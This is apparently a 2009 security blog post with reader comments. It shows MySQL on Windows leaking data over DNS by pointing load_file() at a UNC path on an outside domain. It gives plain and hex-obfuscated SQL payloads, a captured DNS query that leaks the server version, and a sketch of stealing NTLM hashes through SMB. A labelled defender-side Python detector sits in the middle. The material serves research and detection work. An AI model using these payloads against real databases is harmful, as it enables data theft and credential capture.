MySQL: Exfiltrating Data Over Out-Of-Band Channels (OOB)

Exfiltrating data over DNS is nowadays a very popular technique. It has been well documented for MS-SQL and Oracle databases. I figured out that it is also possible to do the same with a MySQL installation on Windows.

Here’s how:

select load_file(concat('\\\\foo.',(select 'test'),'.notsosecure.com\\','a.txt'));

This query makes the server do a DNS lookup for foo.test.notsosecure.com (the UNC host in \\foo.test.notsosecure.com\a.txt). You need the FILE privilege to call load_file(). It is quite common to find MySQL accessed as the 'root' user in a Windows installation (in the application's connection string).

You can also use hex encoding of the string literals to bypass the magic_quotes restriction:

mysql> -- 0x5c5c5c5c732e = '\\\\s.', 0x2e74657374 = '.test',
mysql> -- 0x2e6e6f74736f7365637572652e636f6d5c5c = '.notsosecure.com\\', 0x622e747874 = 'b.txt'
mysql> select load_file(concat(0x5c5c5c5c732e,(select concat((select mid(version(),1,12)),0x2e74657374)),0x2e6e6f74736f7365637572652e636f6d5c5c,0x622e747874));

This resulted in the following DNS query:
05:20:36.349860 IP xxx.xxx.xxx.xxx.53298 > yyy.yyy.yyy.yyy.53: 17495 A? s.5.1.30-commu.test.notsosecure.com. (53)

The MySQL version is 5.1.30-community; mid(version(),1,12) truncates it to the 12 characters "5.1.30-commu" seen in the query name.
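As an added defender-side example (not code from the original post): a small Python helper a reviewer of MySQL's general query log could use to decode the hex-obfuscated literals in a logged query and report whether load_file() is being pointed at a UNC host. The sample queries are constructed from the two statements above; the nested SELECT is not a literal, so only the static skeleton of the path is reassembled.

```python
import re

# MySQL hex literal (0x...) or single-quoted string literal (backslash escapes allowed).
LITERAL = re.compile(r"0x([0-9A-Fa-f]+)|'((?:[^'\\]|\\.)*)'")
# Leading backslashes of a UNC path followed by the host name (first path component).
UNC_HOST = re.compile(r"^\\{2,}([^\\]+)")

# Constructed sample log entries: the plain and the hex-encoded query from the post,
# plus a harmless local load_file() call for contrast.
SAMPLE_QUERIES = [
    r"select load_file(concat('\\\\foo.',(select 'test'),'.notsosecure.com\\','a.txt'))",
    "select load_file(concat(0x5c5c5c5c732e,(select concat((select mid(version(),1,12)),"
    "0x2e74657374)),0x2e6e6f74736f7365637572652e636f6d5c5c,0x622e747874))",
    "select load_file('/etc/hosts')",
]


def literal_fragments(query):
    """Yield the plain text of every string literal in the query, in order.
    Hex literals are decoded byte-for-byte; quoted literals get MySQL's
    backslash escapes resolved (so '\\\\' becomes two backslashes)."""
    for m in LITERAL.finditer(query):
        if m.group(1) is not None:
            yield bytes.fromhex(m.group(1)).decode("latin-1")
        else:
            yield re.sub(r"\\(.)", r"\1", m.group(2))


def inspect_load_file(query):
    """Summarise one logged query: does it call load_file(), does it hide its
    arguments in hex literals, and do the literals assemble into a UNC path?
    Dynamic parts (e.g. a nested SELECT) are absent, so the host is a skeleton."""
    text = "".join(literal_fragments(query))
    host = UNC_HOST.match(text)
    return {
        "load_file": re.search(r"\bload_file\s*\(", query, re.I) is not None,
        "hex_literals": re.search(r"\b0x[0-9A-Fa-f]+", query) is not None,
        "unc_path": host is not None,
        "unc_host_skeleton": host.group(1) if host else None,
    }


def flag_unc_load_file(queries):
    """Return the queries that combine load_file() with a UNC target."""
    return [q for q in queries if (r := inspect_load_file(q))["load_file"] and r["unc_path"]]


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(inspect_load_file(q))
```

Both network-path queries are flagged even though the second one contains no readable hostname until its hex literals are decoded.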

Now, MySQL under Windows runs as SYSTEM by default. If it were running under a user account (e.g. Administrator or a domain admin), then you can make it connect to your SMB server, send a pre-calculated challenge (SMB challenge-response), and from the response obtained from the MySQL server crack the NTLM session hash and thus obtain that user's password.

I made a video demonstration of how to do it under MS-SQL using the xp_dirtree stored procedure, which I will post soon.

Enjoy..:)

2 Thoughts on “MySQL: Exfiltrating Data Over Out-Of-Band Channels (OOB)”

  1. very nice :) I remember playing with this before but I couldn't get it working at that time.

  2. kuza55 on March 4, 2009 at 11:59 am said:

    Do you know what preconditions need to be satisfied for the app to start sending NTLM credentials? I assume they have to be domain joined, but is there anything else? And do you know how IE has fixed this to stop internet sites from getting user hashes?

    Given windows file functionality interprets UNC paths natively, this seems like something that could be utilised to hack a whole lot of other software…
